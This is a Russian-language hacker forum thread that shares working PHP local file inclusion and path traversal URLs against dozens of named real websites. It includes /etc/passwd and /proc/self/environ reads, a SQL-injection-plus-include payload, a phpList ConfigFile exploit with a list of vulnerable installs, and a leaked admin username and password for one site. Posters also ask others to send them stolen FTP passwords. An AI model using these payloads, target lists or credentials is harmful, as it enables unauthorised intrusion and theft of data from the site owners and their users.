PHP Иньекции

Greetz again here a little site in Netherlands

www.catchlight.nl/index.php?pagina=../../../../../../../../../../etc/passwd%00

 

Code:

http://www.atlllc.com/atlantis.php?page=/etc/passwd%00

Code:

http://www.naturesgoodness.com.au/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html

Code:

http://www.outlets.ca/cgi-bin/tseekdir.cgi?location=/etc/passwd%00

 

Code:

http://anapacenter.info/index.pl?id=../../../../../../../../../../etc/passwd%00

 

http://www.zambezigroceries.com/index.php?page=../../../../../../../../../proc/self/environ

 

www.dnocs.gov.br/php/util/downloads_file.php?&dir=&file=/etc/passwd

 

http://www.durangotelegraph.com/index.php?inc=/../../../../../../../../../../../../../../etc/passwd
http://www.ege.fcen.uba.ar/index.php?inc=../../../../../../../../../../../../../../etc/passwd
http://www.freulerchilbi.ch/index.php?inc=../../../../../../../../../../../../../../etc/passwd
http://www.mombergstube.de/index.php?inc=../../../../../../../../../../../../../../etc/passwd
http://www.q3s.de/portfolio/index.php?inc=../../../../../../../../../../../../../../etc/passwd
http://www.helpwithmath.com/index.php?include=../../../../../../../../../../../../../../etc/passwd

http://www.biodieselcambodia.com/index.php?inc=../../../../../../../../../../../../../../proc/self/environ
http://www.christianalbrecht.de/au/index.php?inc=../../../../../../../../../../../../../../proc/self/environ
http://www.dogwalker.com.br/blog/index.php?inc=../../../../../../../../../../../../../../proc/self/environ

Мешает open_basedir
http://pdcon.cz/elearning/obcan/index.php?inc=open_basedir
http://www.zeegersloot.nl/index.php?inc=open_basedir
http://www.mediahostnet.com/v2/index.php?inc=manual&p=open_basedir
http://www.outtatime.com.au/index.php?inc=open_basedir
http://stramberk.ecn.cz/index.php?inc=open_basedir
http://www.dieschwarzataler.at/album/index.php?inc=open_basedir
http://www.zonabern.ch/index.php?inc=open_basedir
http://www.stufenlos.ch/index.php?inc=open_basedir
http://kompaktservice.com/index.php?include=open_basedir

Read File | windows
http://classicandbasic.sytes.net/classic/index.php?inc=windows_inc
http://www.kyoto-eiyoiryo.ac.jp/kisotsu/index.php?inc=windows_inc
http://www.doh.gov.za/hmtp/index.php?include=windows_inc
http://www.cafda.org.za/index.php?include=windows_inc
http://www.fes.org.za/index.php?include=windows_inc
http://www.fawu.org.za/index.php?include=windows_inc
http://www.lionfunds.co.za/index.php?include=windows_inc

 

Чёрным по черному
http://www.venturesnowboards.com/index_07.php?inc=../../../../../../../../../../../../../etc/passwd

 

http://www.artdesigner.ru/?f=web&p=Локальный инклюд (Стоят Chmod'ы )
http://www.artoi.ru/index.php?p=х.з. вроде инклюд

 

Code:

http://sportskenovosti.hr/index.php?cmd=../../../../etc/passwd%00

Code:

http://support.novusnow.ca/internet/index.php?cmd=../../../etc/passwd%00

Code:

http://www.rv-nrw.de/page.php?include=../../../../../../etc/passwd

 

sql injection+php include - т.к. вывода нету то можно узать как php include.

PHP:

http://www.swsys.ru/index.php?page=53+union+select+1,2,3,4,0x2e2e2f2e2e2f2e2e2f2e2e2f626f6f742e696e69,6,7,8--+


 

пик.орг

Code:

http://www.peek.org/bryan/game/dnd.php?p=../../../../../../../../etc/passwd%00

 

Code:

http://www.amacanada.org/template.php?fileName=../../../../../../../../../../../../../../../../../etc/passwd

Code:

http://www.syntasoft.com/template.php?filename=../../../../../../../../../../../../../../../../../etc/passwd

Code:

http://www.supreme-commander.ru/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd

Code:

http://4ertim.com/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd

Code:

http://prospectinfo.ru/autohtml.php?filename=../../../../../../../../../../../../../../../../../../etc/passwd

 

http://www.nccs.biz/lebanonballetschool/display.php?page=display.php

тама редирект так чо открывать каким нить AccessDiver!
100 пост )))

 

Code:

http://www.autobahn24.net/autohtml.php?filename=../../../../../../../../../../../../../../../../../etc/passwd

Code:

http://www.liga24.org/autohtml.php?filename=../../../../../../../../../../../../../../../../../etc/passwd

Code:

http://www.rechtsberater-cccr.de/autohtml.php?filename=../../../../../../../../../../../../../../../../../etc/passwd

и немного клубнички:

Code:

http://www.wildhookups.com/hosted/index.php?wm_login=hornyguys&cf=&geo=&app=&sub=&site=man_hook_ups1&page=../../../../../../../../../../../../../../../../../etc/passwd

 

http://www.broughton.nsw.edu.au/casc/template.php?include=../../../../../../../../../../../../../../etc/passwd&heading=Links

 

а тут phpinfo() :

возможно просматривать директории т.к. используется fopen + потому что ось FreeBSD (Морок)

Как пример http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=../../../../../../../../../../../../etc/

если кто сможет найти пароли от фтп киньте плиз в личку оч прошу)))

 

PHPlist Bug

Post Command:

_SERVER[ConfigFile]=../../../../../../../../../../../etc/passwd

http://www.scythe-eu.com/newsletter/lists//admin/index.php
http://newsletter.mdg-unternehmensberatung.de/newsletter/lists//admin/index.php
http://www.rmaxinternational.com/newsletter/lists//admin/index.php
http://www.kulinaria-mehr.de/newsletter/lists//admin/index.php
http://www.oil-price.net:8000/newsletter/lists//admin/index.php
http://news.eu123.info/newsletter/lists//admin/index.php
http://unicornnight.com/Newsletter/lists//admin/index.php
http://www.london-executive.com/newsletter/lists//admin/index.php
http://www.ready2move.be/newsletter/lists//admin/index.php
http://www.tstratmann.de/newsletter/lists//admin/index.php
http://www.lightupxmas.com/newsletter/lists//admin/index.php
http://www.dirtragmag.com/newsletter/lists//admin/index.php
http://www.ehl.edu/newsletter/lists//admin/index.php
http://markdionsbartramstravels.com/newsletter/lists//admin/index.php
http://www.lumifilm.fi/newsletter/lists//admin/index.php
http://www.nvcaz.com/newsletter/lists//admin/index.php
http://www.nwa.cc/newsletter/lists//admin/index.php
http://www.euroindy.com/portal/newsletter/lists//admin/index.php
http://www.stone-flooring-tips.com/newsletter/lists//admin/index.php
http://www.tangleweed.org/mail/lists//admin/index.php
http://www.dirtysouthevents.com/mail/lists//admin/index.php
http://www.osdnashville.org/newsletter/lists//admin/index.php
http://oldtownaa.com/mail/lists//admin/index.php
http://odnavaiaescola.com/mail/lists//admin/index.php

 

http://www.kozcollective.nl/site2/index.php?pagefile=../../../../../../../../../../../../etc/passwd%00
http://www.accessibility.nl/games/index.php?pagefile=../../../../../../../../../../../etc/passwd%00

 

http://iskatel.org/

http://iskatel.org/?p=4&id=../../admin.php%00

login:Minerale
pass:03051968

Админка: http://iskatel.org/admin.php

P.S. 2 KIR@PRO : Диры читаются не потому что fopen, а потому что ось FreeBSD

 

http://www.cyclingnews.com/interviews.php?id=../../../../../../../../../../../../../../../../../../../../../etc/passwd%00